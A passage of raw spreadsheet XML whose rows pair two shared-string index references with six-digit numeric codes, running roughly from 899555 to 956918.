      <c r="B22393" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22393" s="15">
        <v>899555</v>
      </c>
    </row>
    <row r="22394" spans="1:3">
      <c r="A22394" s="28" t="s">
        <v>27043</v>
      </c>
      <c r="B22394" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22394" s="15">
        <v>899645</v>
      </c>
    </row>
    <row r="22395" spans="1:3">
      <c r="A22395" s="28" t="s">
        <v>27043</v>
      </c>
      <c r="B22395" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22395" s="15">
        <v>899667</v>
      </c>
    </row>
    <row r="22396" spans="1:3">
      <c r="A22396" s="28" t="s">
        <v>27043</v>
      </c>
      <c r="B22396" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22396" s="15">
        <v>899674</v>
      </c>
    </row>
    <row r="22397" spans="1:3">
      <c r="A22397" s="28" t="s">
        <v>27043</v>
      </c>
      <c r="B22397" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22397" s="15">
        <v>899855</v>
      </c>
    </row>
    <row r="22398" spans="1:3">
      <c r="A22398" s="28" t="s">
        <v>27044</v>
      </c>
      <c r="B22398" s="14" t="s">
        <v>17511</v>
      </c>
      <c r="C22398" s="15">
        <v>900000</v>
      </c>
    </row>
    <row r="22399" spans="1:3">
      <c r="A22399" s="28" t="s">
        <v>27045</v>
      </c>
      <c r="B22399" s="14" t="s">
        <v>17512</v>
      </c>
      <c r="C22399" s="15">
        <v>900010</v>
      </c>
    </row>
    <row r="22400" spans="1:3">
      <c r="A22400" s="28" t="s">
        <v>27046</v>
      </c>
      <c r="B22400" s="14" t="s">
        <v>7536</v>
      </c>
      <c r="C22400" s="15">
        <v>900900</v>
      </c>
    </row>
    <row r="22401" spans="1:3">
      <c r="A22401" s="28" t="s">
        <v>27047</v>
      </c>
      <c r="B22401" s="14" t="s">
        <v>17513</v>
      </c>
      <c r="C22401" s="15">
        <v>900909</v>
      </c>
    </row>
    <row r="22402" spans="1:3">
      <c r="A22402" s="28" t="s">
        <v>27048</v>
      </c>
      <c r="B22402" s="14" t="s">
        <v>17514</v>
      </c>
      <c r="C22402" s="15">
        <v>900920</v>
      </c>
    </row>
    <row r="22403" spans="1:3">
      <c r="A22403" s="28" t="s">
        <v>27049</v>
      </c>
      <c r="B22403" s="14" t="s">
        <v>17515</v>
      </c>
      <c r="C22403" s="15">
        <v>900923</v>
      </c>
    </row>
    <row r="22404" spans="1:3">
      <c r="A22404" s="28" t="s">
        <v>27050</v>
      </c>
      <c r="B22404" s="14" t="s">
        <v>17516</v>
      </c>
      <c r="C22404" s="15">
        <v>900925</v>
      </c>
    </row>
    <row r="22405" spans="1:3">
      <c r="A22405" s="28" t="s">
        <v>27051</v>
      </c>
      <c r="B22405" s="14" t="s">
        <v>17517</v>
      </c>
      <c r="C22405" s="15">
        <v>900954</v>
      </c>
    </row>
    <row r="22406" spans="1:3">
      <c r="A22406" s="28" t="s">
        <v>27052</v>
      </c>
      <c r="B22406" s="14" t="s">
        <v>17518</v>
      </c>
      <c r="C22406" s="15">
        <v>900956</v>
      </c>
    </row>
    <row r="22407" spans="1:3">
      <c r="A22407" s="28" t="s">
        <v>27053</v>
      </c>
      <c r="B22407" s="14" t="s">
        <v>17519</v>
      </c>
      <c r="C22407" s="15">
        <v>900957</v>
      </c>
    </row>
    <row r="22408" spans="1:3">
      <c r="A22408" s="28" t="s">
        <v>27054</v>
      </c>
      <c r="B22408" s="14" t="s">
        <v>17520</v>
      </c>
      <c r="C22408" s="15">
        <v>900960</v>
      </c>
    </row>
    <row r="22409" spans="1:3">
      <c r="A22409" s="28" t="s">
        <v>27055</v>
      </c>
      <c r="B22409" s="14" t="s">
        <v>17521</v>
      </c>
      <c r="C22409" s="15">
        <v>900989</v>
      </c>
    </row>
    <row r="22410" spans="1:3">
      <c r="A22410" s="28" t="s">
        <v>27056</v>
      </c>
      <c r="B22410" s="14" t="s">
        <v>17522</v>
      </c>
      <c r="C22410" s="15">
        <v>900990</v>
      </c>
    </row>
    <row r="22411" spans="1:3">
      <c r="A22411" s="28" t="s">
        <v>27057</v>
      </c>
      <c r="B22411" s="14" t="s">
        <v>17523</v>
      </c>
      <c r="C22411" s="15">
        <v>900991</v>
      </c>
    </row>
    <row r="22412" spans="1:3">
      <c r="A22412" s="28" t="s">
        <v>27058</v>
      </c>
      <c r="B22412" s="14" t="s">
        <v>17524</v>
      </c>
      <c r="C22412" s="15">
        <v>900992</v>
      </c>
    </row>
    <row r="22413" spans="1:3">
      <c r="A22413" s="28" t="s">
        <v>27059</v>
      </c>
      <c r="B22413" s="14" t="s">
        <v>17525</v>
      </c>
      <c r="C22413" s="15">
        <v>900993</v>
      </c>
    </row>
    <row r="22414" spans="1:3">
      <c r="A22414" s="28" t="s">
        <v>27060</v>
      </c>
      <c r="B22414" s="14" t="s">
        <v>17526</v>
      </c>
      <c r="C22414" s="15">
        <v>900994</v>
      </c>
    </row>
    <row r="22415" spans="1:3">
      <c r="A22415" s="28" t="s">
        <v>27061</v>
      </c>
      <c r="B22415" s="14" t="s">
        <v>17527</v>
      </c>
      <c r="C22415" s="15">
        <v>900995</v>
      </c>
    </row>
    <row r="22416" spans="1:3">
      <c r="A22416" s="28" t="s">
        <v>27062</v>
      </c>
      <c r="B22416" s="14" t="s">
        <v>17528</v>
      </c>
      <c r="C22416" s="15">
        <v>900996</v>
      </c>
    </row>
    <row r="22417" spans="1:3">
      <c r="A22417" s="28" t="s">
        <v>27063</v>
      </c>
      <c r="B22417" s="14" t="s">
        <v>15348</v>
      </c>
      <c r="C22417" s="15">
        <v>900997</v>
      </c>
    </row>
    <row r="22418" spans="1:3">
      <c r="A22418" s="28" t="s">
        <v>27064</v>
      </c>
      <c r="B22418" s="14" t="s">
        <v>17529</v>
      </c>
      <c r="C22418" s="15">
        <v>900998</v>
      </c>
    </row>
    <row r="22419" spans="1:3">
      <c r="A22419" s="28" t="s">
        <v>27065</v>
      </c>
      <c r="B22419" s="14" t="s">
        <v>8645</v>
      </c>
      <c r="C22419" s="15">
        <v>901900</v>
      </c>
    </row>
    <row r="22420" spans="1:3">
      <c r="A22420" s="28" t="s">
        <v>27066</v>
      </c>
      <c r="B22420" s="14" t="s">
        <v>8709</v>
      </c>
      <c r="C22420" s="15">
        <v>901901</v>
      </c>
    </row>
    <row r="22421" spans="1:3">
      <c r="A22421" s="28" t="s">
        <v>27067</v>
      </c>
      <c r="B22421" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22421" s="15">
        <v>901902</v>
      </c>
    </row>
    <row r="22422" spans="1:3">
      <c r="A22422" s="28" t="s">
        <v>27068</v>
      </c>
      <c r="B22422" s="14" t="s">
        <v>17530</v>
      </c>
      <c r="C22422" s="15">
        <v>901904</v>
      </c>
    </row>
    <row r="22423" spans="1:3">
      <c r="A22423" s="28" t="s">
        <v>27069</v>
      </c>
      <c r="B22423" s="14" t="s">
        <v>17531</v>
      </c>
      <c r="C22423" s="15">
        <v>901910</v>
      </c>
    </row>
    <row r="22424" spans="1:3">
      <c r="A22424" s="28" t="s">
        <v>27069</v>
      </c>
      <c r="B22424" s="14" t="s">
        <v>17531</v>
      </c>
      <c r="C22424" s="15">
        <v>901911</v>
      </c>
    </row>
    <row r="22425" spans="1:3">
      <c r="A22425" s="28" t="s">
        <v>27070</v>
      </c>
      <c r="B22425" s="14" t="s">
        <v>7281</v>
      </c>
      <c r="C22425" s="15">
        <v>902900</v>
      </c>
    </row>
    <row r="22426" spans="1:3">
      <c r="A22426" s="28" t="s">
        <v>27071</v>
      </c>
      <c r="B22426" s="14" t="s">
        <v>11872</v>
      </c>
      <c r="C22426" s="15">
        <v>902901</v>
      </c>
    </row>
    <row r="22427" spans="1:3">
      <c r="A22427" s="28" t="s">
        <v>27072</v>
      </c>
      <c r="B22427" s="14" t="s">
        <v>8580</v>
      </c>
      <c r="C22427" s="15">
        <v>902902</v>
      </c>
    </row>
    <row r="22428" spans="1:3">
      <c r="A22428" s="28" t="s">
        <v>27073</v>
      </c>
      <c r="B22428" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22428" s="15">
        <v>902904</v>
      </c>
    </row>
    <row r="22429" spans="1:3">
      <c r="A22429" s="28" t="s">
        <v>27074</v>
      </c>
      <c r="B22429" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22429" s="15">
        <v>902905</v>
      </c>
    </row>
    <row r="22430" spans="1:3">
      <c r="A22430" s="28" t="s">
        <v>27075</v>
      </c>
      <c r="B22430" s="14" t="s">
        <v>17532</v>
      </c>
      <c r="C22430" s="15">
        <v>902910</v>
      </c>
    </row>
    <row r="22431" spans="1:3">
      <c r="A22431" s="28" t="s">
        <v>27076</v>
      </c>
      <c r="B22431" s="14" t="s">
        <v>17533</v>
      </c>
      <c r="C22431" s="15">
        <v>902911</v>
      </c>
    </row>
    <row r="22432" spans="1:3">
      <c r="A22432" s="28" t="s">
        <v>27077</v>
      </c>
      <c r="B22432" s="14" t="s">
        <v>17534</v>
      </c>
      <c r="C22432" s="15">
        <v>902914</v>
      </c>
    </row>
    <row r="22433" spans="1:3">
      <c r="A22433" s="28" t="s">
        <v>27078</v>
      </c>
      <c r="B22433" s="14" t="s">
        <v>17535</v>
      </c>
      <c r="C22433" s="15">
        <v>902915</v>
      </c>
    </row>
    <row r="22434" spans="1:3">
      <c r="A22434" s="28" t="s">
        <v>27079</v>
      </c>
      <c r="B22434" s="14" t="s">
        <v>17536</v>
      </c>
      <c r="C22434" s="15">
        <v>902920</v>
      </c>
    </row>
    <row r="22435" spans="1:3">
      <c r="A22435" s="28" t="s">
        <v>27080</v>
      </c>
      <c r="B22435" s="14" t="s">
        <v>17537</v>
      </c>
      <c r="C22435" s="15">
        <v>902930</v>
      </c>
    </row>
    <row r="22436" spans="1:3">
      <c r="A22436" s="28" t="s">
        <v>27081</v>
      </c>
      <c r="B22436" s="14" t="s">
        <v>17538</v>
      </c>
      <c r="C22436" s="15">
        <v>902931</v>
      </c>
    </row>
    <row r="22437" spans="1:3">
      <c r="A22437" s="28" t="s">
        <v>27082</v>
      </c>
      <c r="B22437" s="14" t="s">
        <v>17539</v>
      </c>
      <c r="C22437" s="15">
        <v>902952</v>
      </c>
    </row>
    <row r="22438" spans="1:3">
      <c r="A22438" s="28" t="s">
        <v>27083</v>
      </c>
      <c r="B22438" s="14" t="s">
        <v>17540</v>
      </c>
      <c r="C22438" s="15">
        <v>902953</v>
      </c>
    </row>
    <row r="22439" spans="1:3">
      <c r="A22439" s="28" t="s">
        <v>27084</v>
      </c>
      <c r="B22439" s="14" t="s">
        <v>17541</v>
      </c>
      <c r="C22439" s="15">
        <v>902954</v>
      </c>
    </row>
    <row r="22440" spans="1:3">
      <c r="A22440" s="28" t="s">
        <v>27085</v>
      </c>
      <c r="B22440" s="14" t="s">
        <v>17542</v>
      </c>
      <c r="C22440" s="15">
        <v>903902</v>
      </c>
    </row>
    <row r="22441" spans="1:3">
      <c r="A22441" s="28" t="s">
        <v>27086</v>
      </c>
      <c r="B22441" s="14" t="s">
        <v>8845</v>
      </c>
      <c r="C22441" s="15">
        <v>903910</v>
      </c>
    </row>
    <row r="22442" spans="1:3">
      <c r="A22442" s="28" t="s">
        <v>27087</v>
      </c>
      <c r="B22442" s="14" t="s">
        <v>17543</v>
      </c>
      <c r="C22442" s="15">
        <v>903952</v>
      </c>
    </row>
    <row r="22443" spans="1:3">
      <c r="A22443" s="28" t="s">
        <v>27088</v>
      </c>
      <c r="B22443" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22443" s="15">
        <v>903953</v>
      </c>
    </row>
    <row r="22444" spans="1:3">
      <c r="A22444" s="28" t="s">
        <v>27089</v>
      </c>
      <c r="B22444" s="14" t="s">
        <v>17544</v>
      </c>
      <c r="C22444" s="15">
        <v>903960</v>
      </c>
    </row>
    <row r="22445" spans="1:3">
      <c r="A22445" s="28" t="s">
        <v>27090</v>
      </c>
      <c r="B22445" s="14" t="s">
        <v>9055</v>
      </c>
      <c r="C22445" s="15">
        <v>905900</v>
      </c>
    </row>
    <row r="22446" spans="1:3">
      <c r="A22446" s="28" t="s">
        <v>27091</v>
      </c>
      <c r="B22446" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22446" s="15">
        <v>905901</v>
      </c>
    </row>
    <row r="22447" spans="1:3">
      <c r="A22447" s="28" t="s">
        <v>27092</v>
      </c>
      <c r="B22447" s="14" t="s">
        <v>9168</v>
      </c>
      <c r="C22447" s="15">
        <v>906900</v>
      </c>
    </row>
    <row r="22448" spans="1:3">
      <c r="A22448" s="28" t="s">
        <v>27093</v>
      </c>
      <c r="B22448" s="14" t="s">
        <v>12031</v>
      </c>
      <c r="C22448" s="15">
        <v>906901</v>
      </c>
    </row>
    <row r="22449" spans="1:3">
      <c r="A22449" s="28" t="s">
        <v>27094</v>
      </c>
      <c r="B22449" s="14" t="s">
        <v>9179</v>
      </c>
      <c r="C22449" s="15">
        <v>907900</v>
      </c>
    </row>
    <row r="22450" spans="1:3">
      <c r="A22450" s="28" t="s">
        <v>27095</v>
      </c>
      <c r="B22450" s="14" t="s">
        <v>17545</v>
      </c>
      <c r="C22450" s="15">
        <v>907901</v>
      </c>
    </row>
    <row r="22451" spans="1:3">
      <c r="A22451" s="28" t="s">
        <v>27096</v>
      </c>
      <c r="B22451" s="14" t="s">
        <v>17546</v>
      </c>
      <c r="C22451" s="15">
        <v>907902</v>
      </c>
    </row>
    <row r="22452" spans="1:3">
      <c r="A22452" s="28" t="s">
        <v>27097</v>
      </c>
      <c r="B22452" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22452" s="15">
        <v>907904</v>
      </c>
    </row>
    <row r="22453" spans="1:3">
      <c r="A22453" s="28" t="s">
        <v>27098</v>
      </c>
      <c r="B22453" s="14" t="s">
        <v>17547</v>
      </c>
      <c r="C22453" s="15">
        <v>907910</v>
      </c>
    </row>
    <row r="22454" spans="1:3">
      <c r="A22454" s="28" t="s">
        <v>27099</v>
      </c>
      <c r="B22454" s="14" t="s">
        <v>17548</v>
      </c>
      <c r="C22454" s="15">
        <v>907911</v>
      </c>
    </row>
    <row r="22455" spans="1:3">
      <c r="A22455" s="28" t="s">
        <v>27100</v>
      </c>
      <c r="B22455" s="14" t="s">
        <v>17549</v>
      </c>
      <c r="C22455" s="15">
        <v>907912</v>
      </c>
    </row>
    <row r="22456" spans="1:3">
      <c r="A22456" s="28" t="s">
        <v>27101</v>
      </c>
      <c r="B22456" s="14" t="s">
        <v>9219</v>
      </c>
      <c r="C22456" s="15">
        <v>908900</v>
      </c>
    </row>
    <row r="22457" spans="1:3">
      <c r="A22457" s="28" t="s">
        <v>27102</v>
      </c>
      <c r="B22457" s="14" t="s">
        <v>17550</v>
      </c>
      <c r="C22457" s="15">
        <v>908901</v>
      </c>
    </row>
    <row r="22458" spans="1:3">
      <c r="A22458" s="28" t="s">
        <v>27103</v>
      </c>
      <c r="B22458" s="14" t="s">
        <v>17551</v>
      </c>
      <c r="C22458" s="15">
        <v>909900</v>
      </c>
    </row>
    <row r="22459" spans="1:3">
      <c r="A22459" s="28" t="s">
        <v>27104</v>
      </c>
      <c r="B22459" s="14" t="s">
        <v>9270</v>
      </c>
      <c r="C22459" s="15">
        <v>909910</v>
      </c>
    </row>
    <row r="22460" spans="1:3">
      <c r="A22460" s="28" t="s">
        <v>27105</v>
      </c>
      <c r="B22460" s="14" t="s">
        <v>9326</v>
      </c>
      <c r="C22460" s="15">
        <v>910900</v>
      </c>
    </row>
    <row r="22461" spans="1:3">
      <c r="A22461" s="28" t="s">
        <v>27106</v>
      </c>
      <c r="B22461" s="14" t="s">
        <v>17552</v>
      </c>
      <c r="C22461" s="15">
        <v>910901</v>
      </c>
    </row>
    <row r="22462" spans="1:3">
      <c r="A22462" s="28" t="s">
        <v>27107</v>
      </c>
      <c r="B22462" s="14" t="s">
        <v>12140</v>
      </c>
      <c r="C22462" s="15">
        <v>911910</v>
      </c>
    </row>
    <row r="22463" spans="1:3">
      <c r="A22463" s="28" t="s">
        <v>27108</v>
      </c>
      <c r="B22463" s="14" t="s">
        <v>12140</v>
      </c>
      <c r="C22463" s="15">
        <v>911911</v>
      </c>
    </row>
    <row r="22464" spans="1:3">
      <c r="A22464" s="28" t="s">
        <v>27109</v>
      </c>
      <c r="B22464" s="14" t="s">
        <v>12140</v>
      </c>
      <c r="C22464" s="15">
        <v>911912</v>
      </c>
    </row>
    <row r="22465" spans="1:3">
      <c r="A22465" s="28" t="s">
        <v>27110</v>
      </c>
      <c r="B22465" s="14" t="s">
        <v>12140</v>
      </c>
      <c r="C22465" s="15">
        <v>911913</v>
      </c>
    </row>
    <row r="22466" spans="1:3">
      <c r="A22466" s="28" t="s">
        <v>27111</v>
      </c>
      <c r="B22466" s="14" t="s">
        <v>12140</v>
      </c>
      <c r="C22466" s="15">
        <v>911914</v>
      </c>
    </row>
    <row r="22467" spans="1:3">
      <c r="A22467" s="28" t="s">
        <v>27112</v>
      </c>
      <c r="B22467" s="14" t="s">
        <v>12149</v>
      </c>
      <c r="C22467" s="15">
        <v>912900</v>
      </c>
    </row>
    <row r="22468" spans="1:3">
      <c r="A22468" s="28" t="s">
        <v>27113</v>
      </c>
      <c r="B22468" s="14" t="s">
        <v>10467</v>
      </c>
      <c r="C22468" s="15">
        <v>912911</v>
      </c>
    </row>
    <row r="22469" spans="1:3">
      <c r="A22469" s="28" t="s">
        <v>27114</v>
      </c>
      <c r="B22469" s="14" t="s">
        <v>9588</v>
      </c>
      <c r="C22469" s="15">
        <v>919900</v>
      </c>
    </row>
    <row r="22470" spans="1:3">
      <c r="A22470" s="28" t="s">
        <v>27115</v>
      </c>
      <c r="B22470" s="14" t="s">
        <v>9613</v>
      </c>
      <c r="C22470" s="15">
        <v>920900</v>
      </c>
    </row>
    <row r="22471" spans="1:3">
      <c r="A22471" s="28" t="s">
        <v>27116</v>
      </c>
      <c r="B22471" s="14" t="s">
        <v>9613</v>
      </c>
      <c r="C22471" s="15">
        <v>920910</v>
      </c>
    </row>
    <row r="22472" spans="1:3">
      <c r="A22472" s="28" t="s">
        <v>27117</v>
      </c>
      <c r="B22472" s="14" t="s">
        <v>12191</v>
      </c>
      <c r="C22472" s="15">
        <v>925900</v>
      </c>
    </row>
    <row r="22473" spans="1:3">
      <c r="A22473" s="28" t="s">
        <v>27118</v>
      </c>
      <c r="B22473" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22473" s="15">
        <v>925901</v>
      </c>
    </row>
    <row r="22474" spans="1:3">
      <c r="A22474" s="28" t="s">
        <v>27119</v>
      </c>
      <c r="B22474" s="14" t="s">
        <v>17553</v>
      </c>
      <c r="C22474" s="15">
        <v>925910</v>
      </c>
    </row>
    <row r="22475" spans="1:3">
      <c r="A22475" s="28" t="s">
        <v>27120</v>
      </c>
      <c r="B22475" s="14" t="s">
        <v>17554</v>
      </c>
      <c r="C22475" s="15">
        <v>925913</v>
      </c>
    </row>
    <row r="22476" spans="1:3">
      <c r="A22476" s="28" t="s">
        <v>27121</v>
      </c>
      <c r="B22476" s="14" t="s">
        <v>9683</v>
      </c>
      <c r="C22476" s="15">
        <v>929900</v>
      </c>
    </row>
    <row r="22477" spans="1:3">
      <c r="A22477" s="28" t="s">
        <v>27122</v>
      </c>
      <c r="B22477" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22477" s="15">
        <v>929901</v>
      </c>
    </row>
    <row r="22478" spans="1:3">
      <c r="A22478" s="28" t="s">
        <v>27123</v>
      </c>
      <c r="B22478" s="14" t="s">
        <v>9683</v>
      </c>
      <c r="C22478" s="15">
        <v>929902</v>
      </c>
    </row>
    <row r="22479" spans="1:3">
      <c r="A22479" s="28" t="s">
        <v>27124</v>
      </c>
      <c r="B22479" s="14" t="s">
        <v>17555</v>
      </c>
      <c r="C22479" s="15">
        <v>930900</v>
      </c>
    </row>
    <row r="22480" spans="1:3">
      <c r="A22480" s="28" t="s">
        <v>27125</v>
      </c>
      <c r="B22480" s="14" t="s">
        <v>9760</v>
      </c>
      <c r="C22480" s="15">
        <v>930911</v>
      </c>
    </row>
    <row r="22481" spans="1:3">
      <c r="A22481" s="28" t="s">
        <v>27126</v>
      </c>
      <c r="B22481" s="14" t="s">
        <v>17556</v>
      </c>
      <c r="C22481" s="15">
        <v>930912</v>
      </c>
    </row>
    <row r="22482" spans="1:3">
      <c r="A22482" s="28" t="s">
        <v>27127</v>
      </c>
      <c r="B22482" s="14" t="s">
        <v>7344</v>
      </c>
      <c r="C22482" s="15">
        <v>932900</v>
      </c>
    </row>
    <row r="22483" spans="1:3">
      <c r="A22483" s="28" t="s">
        <v>27128</v>
      </c>
      <c r="B22483" s="14" t="s">
        <v>17557</v>
      </c>
      <c r="C22483" s="15">
        <v>932902</v>
      </c>
    </row>
    <row r="22484" spans="1:3">
      <c r="A22484" s="28" t="s">
        <v>27129</v>
      </c>
      <c r="B22484" s="14" t="s">
        <v>17558</v>
      </c>
      <c r="C22484" s="15">
        <v>932925</v>
      </c>
    </row>
    <row r="22485" spans="1:3">
      <c r="A22485" s="28" t="s">
        <v>27130</v>
      </c>
      <c r="B22485" s="14" t="s">
        <v>17559</v>
      </c>
      <c r="C22485" s="15">
        <v>932926</v>
      </c>
    </row>
    <row r="22486" spans="1:3">
      <c r="A22486" s="28" t="s">
        <v>27131</v>
      </c>
      <c r="B22486" s="14" t="s">
        <v>17560</v>
      </c>
      <c r="C22486" s="15">
        <v>932930</v>
      </c>
    </row>
    <row r="22487" spans="1:3">
      <c r="A22487" s="28" t="s">
        <v>27132</v>
      </c>
      <c r="B22487" s="14" t="s">
        <v>11700</v>
      </c>
      <c r="C22487" s="15">
        <v>932977</v>
      </c>
    </row>
    <row r="22488" spans="1:3">
      <c r="A22488" s="28" t="s">
        <v>27133</v>
      </c>
      <c r="B22488" s="14" t="s">
        <v>17561</v>
      </c>
      <c r="C22488" s="15">
        <v>935900</v>
      </c>
    </row>
    <row r="22489" spans="1:3">
      <c r="A22489" s="28" t="s">
        <v>27134</v>
      </c>
      <c r="B22489" s="14" t="s">
        <v>12389</v>
      </c>
      <c r="C22489" s="15">
        <v>935902</v>
      </c>
    </row>
    <row r="22490" spans="1:3">
      <c r="A22490" s="28" t="s">
        <v>27135</v>
      </c>
      <c r="B22490" s="14" t="s">
        <v>17562</v>
      </c>
      <c r="C22490" s="15">
        <v>935911</v>
      </c>
    </row>
    <row r="22491" spans="1:3">
      <c r="A22491" s="28" t="s">
        <v>27136</v>
      </c>
      <c r="B22491" s="14" t="s">
        <v>17563</v>
      </c>
      <c r="C22491" s="15">
        <v>935913</v>
      </c>
    </row>
    <row r="22492" spans="1:3">
      <c r="A22492" s="28" t="s">
        <v>27137</v>
      </c>
      <c r="B22492" s="14" t="s">
        <v>17564</v>
      </c>
      <c r="C22492" s="15">
        <v>935914</v>
      </c>
    </row>
    <row r="22493" spans="1:3">
      <c r="A22493" s="28" t="s">
        <v>22992</v>
      </c>
      <c r="B22493" s="14" t="s">
        <v>12379</v>
      </c>
      <c r="C22493" s="15">
        <v>935922</v>
      </c>
    </row>
    <row r="22494" spans="1:3">
      <c r="A22494" s="28" t="s">
        <v>27138</v>
      </c>
      <c r="B22494" s="14" t="s">
        <v>17565</v>
      </c>
      <c r="C22494" s="15">
        <v>935933</v>
      </c>
    </row>
    <row r="22495" spans="1:3">
      <c r="A22495" s="28" t="s">
        <v>27139</v>
      </c>
      <c r="B22495" s="14" t="s">
        <v>13747</v>
      </c>
      <c r="C22495" s="15">
        <v>935938</v>
      </c>
    </row>
    <row r="22496" spans="1:3">
      <c r="A22496" s="28" t="s">
        <v>27140</v>
      </c>
      <c r="B22496" s="14" t="s">
        <v>10199</v>
      </c>
      <c r="C22496" s="15">
        <v>936900</v>
      </c>
    </row>
    <row r="22497" spans="1:3">
      <c r="A22497" s="28" t="s">
        <v>27141</v>
      </c>
      <c r="B22497" s="14" t="s">
        <v>10085</v>
      </c>
      <c r="C22497" s="15">
        <v>938900</v>
      </c>
    </row>
    <row r="22498" spans="1:3">
      <c r="A22498" s="28" t="s">
        <v>27142</v>
      </c>
      <c r="B22498" s="14" t="s">
        <v>14847</v>
      </c>
      <c r="C22498" s="15">
        <v>940900</v>
      </c>
    </row>
    <row r="22499" spans="1:3">
      <c r="A22499" s="28" t="s">
        <v>27143</v>
      </c>
      <c r="B22499" s="14" t="s">
        <v>10263</v>
      </c>
      <c r="C22499" s="15">
        <v>942900</v>
      </c>
    </row>
    <row r="22500" spans="1:3">
      <c r="A22500" s="28" t="s">
        <v>27144</v>
      </c>
      <c r="B22500" s="14" t="s">
        <v>17566</v>
      </c>
      <c r="C22500" s="15">
        <v>942915</v>
      </c>
    </row>
    <row r="22501" spans="1:3">
      <c r="A22501" s="28" t="s">
        <v>27145</v>
      </c>
      <c r="B22501" s="14" t="s">
        <v>12709</v>
      </c>
      <c r="C22501" s="15">
        <v>945129</v>
      </c>
    </row>
    <row r="22502" spans="1:3">
      <c r="A22502" s="28" t="s">
        <v>27146</v>
      </c>
      <c r="B22502" s="14" t="s">
        <v>17567</v>
      </c>
      <c r="C22502" s="15">
        <v>945900</v>
      </c>
    </row>
    <row r="22503" spans="1:3">
      <c r="A22503" s="28" t="s">
        <v>27147</v>
      </c>
      <c r="B22503" s="14" t="s">
        <v>17568</v>
      </c>
      <c r="C22503" s="15">
        <v>945901</v>
      </c>
    </row>
    <row r="22504" spans="1:3">
      <c r="A22504" s="28" t="s">
        <v>27148</v>
      </c>
      <c r="B22504" s="14" t="s">
        <v>17569</v>
      </c>
      <c r="C22504" s="15">
        <v>945903</v>
      </c>
    </row>
    <row r="22505" spans="1:3">
      <c r="A22505" s="28" t="s">
        <v>27149</v>
      </c>
      <c r="B22505" s="14" t="s">
        <v>17570</v>
      </c>
      <c r="C22505" s="15">
        <v>945904</v>
      </c>
    </row>
    <row r="22506" spans="1:3">
      <c r="A22506" s="28" t="s">
        <v>20766</v>
      </c>
      <c r="B22506" s="14" t="s">
        <v>8726</v>
      </c>
      <c r="C22506" s="15">
        <v>945913</v>
      </c>
    </row>
    <row r="22507" spans="1:3">
      <c r="A22507" s="28" t="s">
        <v>27150</v>
      </c>
      <c r="B22507" s="14" t="s">
        <v>17571</v>
      </c>
      <c r="C22507" s="15">
        <v>945914</v>
      </c>
    </row>
    <row r="22508" spans="1:3">
      <c r="A22508" s="28" t="s">
        <v>22964</v>
      </c>
      <c r="B22508" s="14" t="s">
        <v>12351</v>
      </c>
      <c r="C22508" s="15">
        <v>945917</v>
      </c>
    </row>
    <row r="22509" spans="1:3">
      <c r="A22509" s="28" t="s">
        <v>27151</v>
      </c>
      <c r="B22509" s="14" t="s">
        <v>17572</v>
      </c>
      <c r="C22509" s="15">
        <v>947900</v>
      </c>
    </row>
    <row r="22510" spans="1:3">
      <c r="A22510" s="28" t="s">
        <v>18952</v>
      </c>
      <c r="B22510" s="14" t="s">
        <v>12751</v>
      </c>
      <c r="C22510" s="15">
        <v>949900</v>
      </c>
    </row>
    <row r="22511" spans="1:3">
      <c r="A22511" s="28" t="s">
        <v>18952</v>
      </c>
      <c r="B22511" s="14" t="s">
        <v>12751</v>
      </c>
      <c r="C22511" s="15">
        <v>949910</v>
      </c>
    </row>
    <row r="22512" spans="1:3">
      <c r="A22512" s="28" t="s">
        <v>27152</v>
      </c>
      <c r="B22512" s="14" t="s">
        <v>17573</v>
      </c>
      <c r="C22512" s="15">
        <v>954900</v>
      </c>
    </row>
    <row r="22513" spans="1:3">
      <c r="A22513" s="28" t="s">
        <v>27153</v>
      </c>
      <c r="B22513" s="14" t="s">
        <v>17574</v>
      </c>
      <c r="C22513" s="15">
        <v>954902</v>
      </c>
    </row>
    <row r="22514" spans="1:3">
      <c r="A22514" s="28" t="s">
        <v>27154</v>
      </c>
      <c r="B22514" s="14" t="s">
        <v>17575</v>
      </c>
      <c r="C22514" s="15">
        <v>954913</v>
      </c>
    </row>
    <row r="22515" spans="1:3">
      <c r="A22515" s="28" t="s">
        <v>27155</v>
      </c>
      <c r="B22515" s="14" t="s">
        <v>17576</v>
      </c>
      <c r="C22515" s="15">
        <v>956902</v>
      </c>
    </row>
    <row r="22516" spans="1:3">
      <c r="A22516" s="28" t="s">
        <v>27156</v>
      </c>
      <c r="B22516" s="14" t="s">
        <v>17577</v>
      </c>
      <c r="C22516" s="15">
        <v>956904</v>
      </c>
    </row>
    <row r="22517" spans="1:3">
      <c r="A22517" s="28" t="s">
        <v>27157</v>
      </c>
      <c r="B22517" s="14" t="s">
        <v>17578</v>
      </c>
      <c r="C22517" s="15">
        <v>956909</v>
      </c>
    </row>
    <row r="22518" spans="1:3">
      <c r="A22518" s="28" t="s">
        <v>27158</v>
      </c>
      <c r="B22518" s="14" t="s">
        <v>17579</v>
      </c>
      <c r="C22518" s="15">
        <v>956910</v>
      </c>
    </row>
    <row r="22519" spans="1:3">
      <c r="A22519" s="28" t="s">
        <v>27159</v>
      </c>
      <c r="B22519" s="14" t="s">
        <v>17580</v>
      </c>
      <c r="C22519" s="15">
        <v>956911</v>
      </c>
    </row>
    <row r="22520" spans="1:3">
      <c r="A22520" s="28" t="s">
        <v>178</v>
      </c>
      <c r="B22520" s="14" t="s">
        <v>7386</v>
      </c>
      <c r="C22520" s="15">
        <v>956916</v>
      </c>
    </row>
    <row r="22521" spans="1:3">
      <c r="A22521" s="28" t="s">
        <v>1030</v>
      </c>
      <c r="B22521" s="14" t="s">
        <v>9826</v>
      </c>
      <c r="C22521" s="15">
        <v>956918</v>
      </c>
    </row>
    <row r="22522" spans="1:3">
      <c r="A22522" s="28" t="s">
        <v>27160</v>
      </c>
      <c r="B22522" s="14" t="s">
        <v>17581</v>
      </c>
